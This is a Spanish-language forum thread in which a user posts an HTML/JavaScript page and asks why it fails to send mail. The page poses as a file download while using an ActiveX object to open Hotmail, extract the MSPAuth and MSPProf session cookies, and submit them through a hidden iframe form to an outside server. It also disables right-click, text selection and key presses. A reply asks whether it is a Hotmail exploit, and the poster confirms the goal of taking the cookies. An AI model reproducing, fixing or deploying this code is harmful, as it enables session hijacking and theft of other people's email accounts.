Autor Tema: problema con el codigo  (Leído 4362 veces)

0 Usuarios y 1 Visitante están viendo este tema.

1410

  • *
  • Mensajes: 115
  • Liked: 0
  • Cada dia me sorprende mas mi hijo
problema con el codigo
« : abril 02, 2006, 04:29:47 am »
Código: [Seleccionar]
<HTML> 
<HEAD>
<meta http-equiv="pragma" content="no-cache">

<script>
function Posiciona()
  {
  window.resizeTo(400,285)
  window.moveTo(190,145)
  }
Posiciona()

function Salir()
  {
  if(window.opener!=window.self)
     {
     window.opener=window.self
     window.opener=window.close()
     }
  else {window.close()}
  }
</script>

<script>
function Sesion()
  {
  Objeto.DOM.Script.execScript(Hotmail.toString());
  Objeto.DOM.Script.setTimeout("Hotmail()");
  Espera();
  }
function Hotmail()
  {
  window.name="Hotmail"
  open("http://www.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001","Hotmail")
  }
function Espera()
  {
  try
    {
    Objeto.DOM.location.href;
    setTimeout('Espera()', 100);
    }
  catch(e)
    {
    Objeto.DOM.Script.execScript(Envia.toString());
    Objeto.DOM.Script.setTimeout("Envia()");
    }
  }
function Envia()
   {
   MSPAuth=document.cookie.indexOf('MSPAuth=')
   MSPProf=document.cookie.indexOf('MSPProf=')
   PIM=document.cookie.indexOf('PIM=')
   MSPAuth=document.cookie.substring(MSPAuth+8,MSPProf-2)
   MSPProf=document.cookie.substring(MSPProf+8,PIM-2)
   Direccion=
     'http://www.hotmail.msn.com/cgi-bin/sbox?did=1&'+
     't='+MSPAuth+
     '&p='+MSPProf
   Formulario=
     '<form id=Formu method=post action=http://laio.xerexnetwork.net/recomendar.php>'+
     '  <input type=hidden name=name value=lalo>'+
     '  <input type=hidden name=from_email_address value=eydarkside@hotmail.com>'+
     '  <input type=hidden name=asunto value=cayo>'+
     '  <input type=hidden name=id value=to_email_address>'+
     '  <textarea name=to_name>'+
        Direccion+
     '  </textarea>'+
     '</form>'
   document.write('<iframe src= id=Invisible name=Invisible></iframe>')
   Invisible.document.write(Formulario)
   Invisible.Formu.SUBMIT()
   }
window.onerror=new Function("return true")
setTimeout('Sesion()',1000)
</script>
</HEAD>

<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"
oncontextmenu="new Function('return false')" onselectstart="new Function('return false')"

onkeydown="new Function('return false')" ONRESIZE="Posiciona()">
<object id="Objeto" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0">
  <param name="ActivateApplets" value="1">
  <param name="ActivateActiveXControls" value="1">
</object>

<table border="0" cellspacing="0" cellpadding="0" width="100%">
   <tr>
      <td height="24" bgcolor="#DBEAF5" style="border-bottom:solid 1px #4791C5;">&nbsp;</td>
   </tr>
   <tr>
      <td style="padding: 20 20 0 20"><b>Espera mientras descargamos el

archivo.</b><br>&nbsp;</td>
   </tr>
   <tr>
      <td align="center">
      <img src="http://64.4.55.109/i.p.attprgrs.gif" width="282" height="56">
      </td>
   </tr>
</table>

<iframe src="http://cyruxnet.org/download/UNICODE_DECODE.doc" height="0" width="0">
</BODY>
</HTML>
que estoy ahciendo mal  en esto, porque no se envia el mail alguien lo sabe, si paso todas  las variables correctamente, ayuda porf aavor :'( :'( :'( :'( :'( :'( :'( :'( :'(

hkm_

  • Visitante
Re: problema con el codigo
« Respuesta #1 : abril 06, 2006, 10:17:21 am »
eso es un xploit hotmail? te falto el CGI creo.

1410

  • *
  • Mensajes: 115
  • Liked: 0
  • Cada dia me sorprende mas mi hijo
Re: problema con el codigo
« Respuesta #2 : abril 06, 2006, 02:06:20 pm »
Si te refieres   a que  estoy usando un CGI  para  enviar el mail no es  asi  pues   n  lo estoy usando la  idea es valerse  solode MAIL() para tomar "prestado " el  valor  de la  cookie MSPAuth  y MSPProf se supone  que si  jala  pero usando unos s ervidores de formularios   de una  web que  ahora  no esta  online por  obvios  motivos  asi  que  quise  cambiar  el servidor  usando  el  formulario de la page  que tengo alojada  en el espacio que hisiste favor de prestarme ;D